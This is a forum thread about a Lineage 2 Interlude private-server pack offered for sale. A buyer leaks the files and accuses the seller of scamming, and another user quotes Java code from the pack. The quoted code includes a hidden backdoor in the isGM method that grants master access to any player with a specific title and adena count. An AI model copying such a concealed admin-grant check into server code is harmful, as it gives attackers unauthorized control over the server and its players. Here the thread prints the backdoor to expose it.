Jump to content

Recommended Posts

Posted

L2-Arena Proffessional Custom Interlude Ready To Go [bassed grankain source]
 
Project based on last grankain source revision
Project ready to start
Tested live 
Perfect working geodata
Perfect working skills like l2off
Perfect working sieges
Video with server preview here
 


 
 
I wish to sell my Lineage2 Interlude Custom PVP Project
Project have ready banners and ready server name for who wish to purchase it
Server name: L2 Arena
You will be able to see logo and banners in the video below...
Project will be sold only 1 time to only 1 person
After the proejct will be sold once to 1 person, the next person who will wish to buy it will recive a reworked project, with changed gameplay style, changed zones, monsters, items, farming items, farming style and whatever the customer ask for.
I do not have time for open the server, i can offer support if there is any bug inside ( for free ), if the customer want support for adding new things or anything else, it will cost, depend how many hours i will work.
I can help setup the server for free.
Project contains latest 2016 bug fixes
All skills reworked to be similar to L2OFF
Same i can say about balance
Do not hesitate to ask for test server, you can test the project whenever you want
Call your friends and come to play on it and see if you like it or not!  :)
The project is an update of Lineage2Prestige ( my last custom pvp server )
The project is based on Prestige Source ( my own private project )
Q: Why i consider this my own private project?
A: Because everything has been added manually and allmost everything has been reworked by me!
PS: Source is suitable for any type of server, even for low rates one.For more info about features contact me on skype.
Here you can see a little preview of the project, here is video:

Chronicle: Interlude
Rates 1000x
Main Town: kamael Village
Max level 85
 
3 Tier Weapons:
- Lindvior Weapons - Tier 1
- Valakas Weapons - Tier 2
- Kelbim Weapons - Tier 3
 
3 Tier Armors:
- Exile Armor - Tier 1
- Valkyria Armor - Tier 2
- Ertheia Armor - Tier 3
 
Upgradable Raid Boss Jewels:
- Core -> Improved Core -> Blessed Core
- Orfen -> Improved Orfen -> Blessed Orfen
- Baium -> Improved Baium -> Blessed Baium
- Queen Ant -> Improved Queen Ant -> Blessed Queen Ant
 
5 types of Elemental Shirts with Awakening Powers
- Ogre
- Monk
- Witch
- Empower
- Rabbit
 
Farm Items currency:
- Adena
- Ancient Adena
- Red Libra ( from boss, low chance from mobs, from champions etc... )
 
Farm Zones:
- Level Zone
- Cruma Tower ( custom ) - Solo Zone
- Underground Temple of Prayer - Hard Zone - party recommended
 
Raid Bosses: 
- Golkonda
- Lilith
- Chaos Van Helsing
- Halisha
- Halisha PVP ZONE
- Antharas
- Valakas
- Baium
- Exiled Anakim ( The Lindvior Guardian ) - location inside Undeground Temple of Prayer Secret Boss Room
 
PVP Zone
- need type: .exit for leave
- auto flag when enter
- auto nobless when enter and when respawn
- auto respawn in 10 seconds
- respawn full hp/cp/mp
- Zone can be changed whenever you want in any other location ( current loc: Pagan Temple )
- Show hp/cp/mp left of your killer
 
SERVER NPC:
- rank manager - show pvp/pk ranking top 10
- augmenter/skill enchanter 2 in 1
- Custom Gm Shop
- Custom Shop - upgrade armor/weapon
- Raid Boss manager show info about raids alive/dead
- Global teleporter
- NPC buffer with all buffs included malarias
- service npc sell all augments directly to your weapon
- class changer
- all in 1 npc warehouse
- symbol maker
- auction npc buy clan hall
- siege npc
- class master npc can add all subclass in same npc even overlord
 
SPECIAL ITEMS
- clan rep scroll
- premium rune ( x2 all rates for 24 hours )
- recommend item get instant 255 rec
- clan coin - get instant clan llv 8
- clan skills coin - get instant all clan skills
 
SOME SERVER PHOTOS
 
Shot00000.jpg
 
Shot00001.jpg
 
Shot00002.jpg
 
Shot00023.jpg
 
Shot00025.jpg
 
Shot00026.jpg
 
Shot00027.jpg
 
Shot00028.jpg
 
Shot00029.jpg
 
Shot00030.jpg

 

MEDIAFIRE pack

MEDIAFIRE patch
MEDIAFIRE source

 

ATTENTION: THIS ARE EXACTLY THE FILES HE UPLOADED TO ME! I DIDNT TOUCH THIS FILES. TRY TO OPEN A SERVER WITH THIS!

SAY THANKS TO MADA AND SMILE GUYS. THIS PACK NEED A LOT OF WORK. I PAY FOR IT AND I GET FAILED, I DONT WANT THE SAME TO YOU!!

Posted

You killing lineage 2 scene.

 

i dont know if is true, but if yes -> interlude the end

 

 

hahahaha, thats a nice one dudee. wp wp. u really make me laught.

Posted (edited)

0axax00ax0ax0ax0ax0ax0ax0ax0ax

check in config.java my @author 

[GR] eiparxi theos!!  :troll:

o pro developer pou elege oti ta file mou einai dika tou

kai ta poulouse. mou eftiakse tin mera!!

	public static int BOSS_ID;
	public static boolean ALLOW_AUTO_NOBLESS_FROM_BOSS;
	public static int RADIUS_TO_RAID;
	public static boolean ALLOW_ANNOUNCE_SPAWN;
	public static boolean ALLOW_KILLER_NAME;
	
	/**
	 * Custom Code my Luna Developer Polymorph npc
	 * 		 and special mage polymorph
	 */

	public static boolean SHOW_HP_POLY;
	public static String RAID_BOSS_HP_PERCENT;
	public static List<Integer> Raid_Boss_Ids_For_Hp = new ArrayList<>();
		
	public static void loadVoteRewardManagerConfig()
	{
		final String file = "./config/functions/votemanagernpc.properties";
		
		try
		{
			final Properties voteManager = new Properties();
			final InputStream is = new FileInputStream(new File(file));
			voteManager.load(is);
			is.close();

			VOTE_LINK_HOPZONE = voteManager.getProperty("HopzoneUrl", "null");
			VOTE_LINK_TOPZONE = voteManager.getProperty("TopzoneUrl", "null");
			VOTE_REWARD_ID1 = Integer.parseInt(voteManager.getProperty("VoteRewardId1", "300"));
			VOTE_REWARD_ID2 = Integer.parseInt(voteManager.getProperty("VoteRewardId2", "300"));
			VOTE_REWARD_ID3 = Integer.parseInt(voteManager.getProperty("VoteRewardId3", "300"));
			VOTE_REWARD_ID4 = Integer.parseInt(voteManager.getProperty("VoteRewardId4", "300"));
			VOTE_REWARD_AMOUNT1 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount1", "300"));
			VOTE_REWARD_AMOUNT2 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount2", "300"));
			VOTE_REWARD_AMOUNT3 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount3", "300"));
			VOTE_REWARD_AMOUNT4 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount4", "300"));
			SECS_TO_VOTE = Integer.parseInt(voteManager.getProperty("SecondsToVote", "20"));
		}
		catch (final Exception e)
		{
			e.printStackTrace();
			throw new Error("Failed to Load " + file + " File.");
		}
	}

more author xD
//custom code by Developer Luna
 
TXT_ENABLE = Boolean.parseBoolean(frozenSettings.getProperty("txtEnable", "False"));
TXT_NAME = frozenSettings.getProperty("txtName", "Welcome");
TXT_ON_ENTER = frozenSettings.getProperty("ChatTxTEnter", "Welcome");

 

and backdoor in L2PcInstance.java

	
	public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}
Edited by tazerman2
Posted

gg mada no more money for shity dev who sell it))

i never thought this day would come

the day that madaftw actually did something good

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

he doesnt deserve any and should be immediately removed from this forum

 

 

i have no reason to get banned. :) i pay for this shiet, so is mine, i can do what ever i want with it. if i wanted to be a shiet i still can refound his money on paypal. but im not a scamer how he say, i just want that to the people to know what he sell.

gj boo i guess you did improve a lot

 

 

2e0f340570.png

Posted

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care . 

Posted

So you basically paid 90e for frozen with custom items?

 

SO SAD. RIGHT?

 

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

 

I DID, but i stop when he call me scamer & lier, he wanted this fight

Posted

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care .

 

No you cant..

*topic*

About topic as i can notice is the shared one cadmus files by tazerman2..

At the end is the truth..liers must be punished

Posted

Lying is easy, told ya you're a scammer. If a single thing works as retail in this pack, I'm the next Pope.

Guest
This topic is now closed to further replies.



  • Posts

    • ⚡ Weekend Stock Refresh! Fast order fulfillment is active. Get Gemini Pro Advanced + Google One cloud storage activated on your own personal email within minutes.
    • New Release World & atmosphere A complete dynamic weather system has arrived, with Clear, Light Rain, Rain, Heavy Rain, Storm, Snow, and Windy presets. Rain and snow react to roofs, wind moves foliage, lightning illuminates storms, exposed ground becomes wet and develops puddles, and snow builds up and melts over time. Weather includes Low to Ultra quality levels and advanced controls for precipitation, wind, cloud cover, lightning, surface wetness, puddles, and snow. The game server can also select or restore the current weather while local quality settings continue to control rendering cost. The weather can be controlled from the server with custom packets. For more details use Shift+Alt+P. Enhanced lighting now allows authored lamps, fires, and other light sources to illuminate towns and interiors. Lights can pulse, flicker, blink, and strobe, flames produce warm dynamic light, and lamps display depth-aware halos. Remastered emissive surfaces are now supported, beginning with illuminated windows in Giran that glow and cast light into their surroundings. Broadcasting Towers now use their correct original scale and animated rings and glow effects. Map, quests & navigation A complete quest journal has been added, with active and completed quests, expandable stages, descriptions, requirements, item progress, quest inventory integration, location controls, and quest cancellation. Quest objectives now appear through flashing minimap and world-map markers, an overhead directional guide, a notification button beside chat, and rotating quest symbols above eligible NPCs. Server-directed radar markers now work across the live minimap and world map, including the original overhead guidance effect and arrival behavior. The original tutorial system now works, including scrollable tutorial pages, animated illustrations, the flashing question button, tutorial links, and movement, camera, pickup, and sit/rest progression events. Server-opened town maps now display their original artwork and the supplied player marker. Shops, storage & items Personal, clan, castle, and freight warehouses now work, including deposits, withdrawals, stack quantities, fees, weight and capacity previews, tooltips, and the original warning and empty-storage dialogs. Account freight now works through the original recipient picker and delivery window, allowing items to be sent to another character on the same account. Multisell exchanges now work, with paged recipe lists, product details, required materials, quantity selection, warnings, and server-backed completion. Manor seed purchasing is now supported through the shop interface, including availability and pricing. Inventory items can now be dragged to the trash button and destroyed after the appropriate warning or quantity prompt. The original in-game calculator now works with mouse and keyboard input. Community The Community Board is now available from the system menu or Alt+B, with Home, Favorites, Region, Clan, Memo, Mail, and Friends sections, retained navigation, forms, scrolling, minimization, and server-provided pages. Characters, cameras & events Striders and Wyverns now render as fully animated mounts with the rider attached correctly. Striders remain ground-based, while Wyverns support three-dimensional flight. Characters now enter a proper falling state after high drops or airborne dismounts, with falling animations and server-authoritative landing and fall-damage handling. Players can now sit on authored world chairs using the correct sit, wait, and stand animations. Server-driven special camera sequences now work, including target tracking, interpolation, duration, widescreen bars, and restoration to the normal camera. GM camera mode and server-authorized ///fly movement are now supported. The original 102-second Kamael teaser sequence has been restored with its complete slideshow, transitions, panning artwork, localized subtitles, and narration. Hats, masks, circlets, and other hair accessories now use their authored head placement and correctly adjust the character's hairstyle. Timed server confirmation dialogs, short-duration status effects, regeneration previews, and the seasonal Christmas Seal presentation are now supported. Interface & performance Character creation has been refined with corrected description wrapping, clipping, layout, and name-entry presentation. Tutorial and NPC dialog windows now use polished proportional scrollbars, improved HTML layout, and correctly sized illustrations and controls. A new independent 3D render-resolution setting offers Native, 720p, 900p, 1080p, 1440p, and 4K choices while keeping the window, HUD, text, and FermaUI at native resolution. Major rendering optimizations reduce unnecessary work in local lighting, shadows, visibility, exposure, bloom, post-processing, and GPU diagnostics. Download from the launcher you have installed, or at https://updates.fermata.gg/ if you don't have the launcher. Fermata Light Engine Preview All lights can be baked in the client, shipped to the users, and exported and imported as .femlight files.
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..